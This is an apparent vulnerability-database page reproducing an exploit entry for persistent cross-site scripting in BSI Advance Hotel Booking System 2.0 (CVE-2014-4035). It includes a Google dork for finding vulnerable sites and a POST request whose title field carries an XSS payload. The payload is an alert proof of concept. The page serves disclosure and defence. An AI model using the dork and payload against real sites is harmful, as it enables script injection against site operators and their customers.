Lucene search
Angelo RuwanthaEXPLOITPACK:A21B2563159C7714FBFBCE266A021902HistoryAug 12, 2019 - 12:00 a.m.
BSI Advance Hotel Booking System 2.0 - booking_details.php Persistent Cross-Site Scripting
2019-08-1200:00:00
Angelo Ruwantha
29
0.002 Low
EPSS
Percentile
57.5%
BSI Advance Hotel Booking System 2.0 - booking_details.php Persistent Cross-Site Scripting
# Exploit Title:BSI Advance Hotel Booking System Persistent XSS
# Google Dork: intext:Hotel Booking System v2.0 © 2008 - 2012 Copyright Best Soft Inc
# Date: Wed Jun 4 2014
# Exploit Author: Angelo Ruwantha
# Vendor Homepage: http://www.bestsoftinc.com
# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
# Version: V2.0
# Tested on: archlinux
# CVE : CVE-2014-4035
Vulnerability
========================
[+]Method:POST
1.http://URL/hotel-booking/booking_details.php (;persistent XSS)
allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=
every parameter injectable :)Related
prion
prion
Cross site scripting
2014-06-11 14:55:00
cvelist
cvelist
CVE-2014-4035
2014-06-11 14:00:00
packetstorm
packetstorm
BSI Advance Hotel Booking System 2.0 Cross Site Scripting
2019-08-12 00:00:00
cve
cve
CVE-2014-4035
2014-06-11 14:55:10
zdt
zdt
nvd
nvd
CVE-2014-4035
2014-06-11 14:55:10
exploitdb
exploitdb